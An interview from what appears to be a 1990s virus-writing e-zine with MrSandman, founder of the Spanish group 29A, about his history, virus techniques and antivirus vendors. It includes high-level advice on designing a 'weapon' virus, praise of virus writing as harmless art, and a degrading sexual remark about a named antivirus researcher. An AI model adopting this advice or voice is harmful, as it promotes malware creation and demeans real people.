So thanks, Sep. It was very nice that you spent some time with this interview.

Not a problem, good luck with *-Zine. (Was I supposed to answer that??) [ Sure, what else ? :) Ed. ]

Interview with MrSandman of 29A

... known as Tarantino's film lover. As i wanted to gain some interviews for this issue i started with Sep. But due to some problem with my mailer daemon, actually the first interview was this one. Lem'me introduce a dude from Spain, who stayed some time in Romania. I guess that the Romania episode was the reason why Mr. Sandman started to write viruses. Just for explanation: Romania borders on Bulgaria.... And Bulgaria.....

Can you introduce yourselves ?

Well, we're just a group of friends who met each other on a BBS, started exchanging ideas and decided (me) to found a virus writing group and release a virus magazine. Most of us are studying a career at the university, others are in the military service, and the rest are studying at school, very near to starting a career.

Your relationship to girl, beer and other lovely subjects

Hehe... well, my relationship with my girlfriend is ok, we even travelled to India and live (sometimes) together in a flat of mine... we've been going out for more than a year :) About beer, i'm sorry, but i don't like it :) I don't like drinking, i only do it in very special circumstances. Other lovely subjects could be music, cinema, and, of course, computing and writing viruses. Anyway, i don't have much free time, as i have a lot of exams and a lot of unreplied BBS and Internet mail... i guess you know this situation :)

When and why did you start to be interested in computers ?

I had my first experience with an 8088 bought by my brother, when i was only 6 or 7. I didn't have any adaptation process or shit like that, i just liked computers since the first time i knew them. Anyway, i must say that my first love was my first Macintosh :)

Your first contact with virus ...

It was some time after buying my first Mac, with a virus called WDEF, with which there were some infected applications my brother brought from his work. Anyway, it was also an AV contact, as i did a disinfection work with an application called ResEdit (the equivalent in Mac OS of the debug.exe of DOS) :) Two years later, more or less, my PC got infected with the Traceback.3066 virus, and that's when i really got interested in viruses, albeit i could not do any 'serious' work until i got a modem and downloaded more virus stuff (especially virus magazines) from spanish underground boards.

What about your first virus ?

Heh... well, there were some projects. The first virus i coded was a 30-byte-more-or-less overwriting infector :) Later i wrote an appending nonresident COM infector, later i tried the EXE infection, SYS files, etc. And that's when i started combining different kinds of infections and inventing some new original stuff. The boot/MBR thing came later, but that's something i never liked, dunno why... this is... i can write a boot/MBR infector in two minutes, but i don't like them at all; don't ask me the reason :)

How did u land in 29A staff ?

Well, actually i never landed... it was the rest of the people who did it :) We all used to interchange ideas and material via a spanish BBS called Dark Node; one day i realised that we had enough stuff to release a zine, and then i proposed it. Many people accepted, so we founded 29A and we started to work in order to release our first zine asap. Anyway, in 29A there's no staff, there's just a boss who takes decisions according to the opinion of the rest of the members, but there are no 'rank' differences between us.

Perspectives of polymorphism

Polymorphism has some advantages if we compare it with other viral techniques such as stealth, for instance. There's no unique routine which mutates viruses, it's something very personal, more personal even than a virus itself. So it depends on the imagination of a virus author to write a powerful, supercomplex poly engine... anyway, right now we must focus on the slow poly stuff, as it's the only way to fuck AVers and make them worth the money they earn. And this last thing depends on the point of view of each virus author; some of us bet on originality, other writers prefer to release their viruses and see how long they stay in the wild... so there's no unique answer.

Perspectives of stealth

Stealth is almost dead, it's the opposite thing to polymorphism. There are very few stealth techniques, as everybody uses the ones which already exist... they only vary a little if you mean full stealth, as it's something which takes a bit more time. They work, so everybody uses them; they're very simple, so it's very difficult to write something really original and special on them. Anyway, Super (new 29A member!) has something to say about this ;)

New systems (W95, NT OS/2 ) and viruses ...

Since Bill Gates is the wealthiest man on earth right now, we must assume that Windows (and i don't mean Windows95 or NT) is the future. Heh, anybody could make all the people think that a crock of shit is good, and even eat it... if he has the money Bill Gates has :) Operating systems such as Linux, OS/2 and Mac OS are very good, but they will die soon as the number of dickheads increases every day. Of course, Windows95 won't be the definitive operating system... anyway, i think that it's a positive thing to spend our time trying to find out more stuff about PE infection under Windows95, as things won't change radically in a LOT of time.

Today I got a message about first virus under Linux. What do you think about it

Good news for the virus community, of course :) That's the second part of the future... 50% will be Windows-dickheaded users, and 50% will be Internet applications developers who will work under Linux/Unix with programming languages such as Java. Anyway, Linux is still a very 'rough' operating system which evolves with very slow but firm steps into a definitive consistent alternative.

Virus as weapon ( bunch of paranoid geeks like NSA,CIA,DIA,SIS 're asked to skip this question and answer)

It'd be very difficult to write such a virus (if you're expecting a good success ratio), cause it'd have to be a slow infector... but not so slow, cause it'd then leave more time for people to discover it. It'd be a good idea to copy itself into unusual places, either using the cavity infection method or the Pascal/C trick used by Zhengxi and Lucretia. There would be many more doubts about this, such as, for instance, whether to be small (the virus) but with a stupid encryption, or to be around 10k long, but encrypted with five highly polymorphic complex engines.

As a Spanish dude, can you describe local virus scene ?

There's no scene besides 29A in Spain... there are many underground boards, but almost all of them without any special relevance. The two most important underground BBSs in Spain are Dark Node and Edison's Temple. In both of them you can find a lot of virus writers, but most of them are members of 29A, or just write a common virus from time to time. It seems that hacking/phreaking is more popular here. In fact, Edison's Temple is a hacking-oriented BBS, just ask Mr. White or Wintermute, two of the most important persons there.

The same stuff as previous but AV

Some time ago there was an antivirus called Skudo, written by a dood from Barcelona called Jordi Más. Anyway, it was designed for preventing against viruses, not for detecting/disinfecting them. As its author left Barcelona and now lives in France, we didn't know anything else about Skudo. There are some other 'pure' AV packages, such as Artemis, Panda, Oyster, XScan, PC-Cillin, and so on, but they're just commercial shit (the typical ignorant dickheads who claim that their antivirus detects over 9000 viruses, you know...).

Your favourite virus and why

Errrhmm... never had anything clear on this. I think i'd choose Zhengxi as my favourite virus, as it's the most complex i've ever seen in my life, and there are still lots of unexplored (commented tho) things in it which can be used in other viruses. It's original, it uses a very insidious infection way, it's the most difficult virus to detect/disassemble, and its poly engine is *awesome*.

Your favourite antivirus program and why

AVP, of course. It's the most professional (well, i'd even say it's the only professional AV), very reliable, easy to use for lamers and very flexible for gurus, it's the one which detects/disinfects the most viruses, and the only AV which includes such necessary (and easy!) techniques as disinfecting known viruses in memory. Its code analyzer is the best, and it's probably the most difficult AV to fool. Besides, i love AVPUtil and AVPRO, two utilities of its registered version :)

Vx coder you would like to meet personally and why

Dunno, this is probably the most difficult question. I think Qark, he's very funny, he's the virus writer i admire most, and i have a very good relationship with him; of course, i'd like to meet other people i admire a lot, such as Quantum, Stormbringer, Rajaat, Q the Misanthrope... who knows, there are a lot. All the 29Aers usually meet in Spain two or three times a year, and we have a lot of fun, we even bring computers to our meetings, so we can execute/write viruses, and so on :) Of course, it would be very nice to do a European VX meeting, that would be da freak! ;)

AV people you would like to meet

I'd like to meet Kaspersky in order to discuss technical stuff... in order to do other things, i'd rather choose Patty Hoffman, for masturbating in her tits, Vesselin Bontchev, in order to suggest him a new haircut, and Frans Veldman, for waking him up.

Are there in Spain some laws against viruses and their author?

There's just a law which forbids modifying/destroying any data, but there's nothing against writing self-reproducing code and/or releasing it; you're guilty only if you're the one who executes it intentionally.

What do you think 'bout maniacs who want to bust and prosecute us, the vx coders and would like to erase the vx scene ?

I call that envy. They just can't understand that the word 'virus' doesn't necessarily imply 'destruction', so they can't understand that many people enjoy themselves writing viruses, just as other people do when they paint pictures or watch TV. They'd probably like to know how to write viruses without having to use VCL, but their morality forbids them to have any kind of relationship or contact with people in the virus scene.

Your plans 4 the future as coder and in general

Just to release a lot of highly successful 29A issues and to have more time to spend on doing the thing i like most: writing viruses. Never mind if they work under DOS, Windows, Windows95 or GameBoy, it's just to feel again the sensation of having written something really original and interesting to the rest of the people.

Last but not least : can you point us to some interestin' online resources on the internet ?

Well, i'm not very used to navigating through the Internet, but anyway i have some interesting addresses in my bookmarks...

WCIVR (Falcon's and Poltergeist's, the largest virus collection on the web)
Greenline's homepage, full of pretty interesting links
Cicatrix's homepage (check it out!)
Roadkill's Café (by Jack the Ripper)
God@rky's virus heaven (probably the most complete)

Btw, pay attention to the major changes and surprises which are gonna take place at the 29A's official website. ;)

So thanks, Mr.Sandman. It was very nice that you spent some time with this interview.

It was nice to answer all your questions, best luck with your magazine! :)

Thanx a lot, dude...
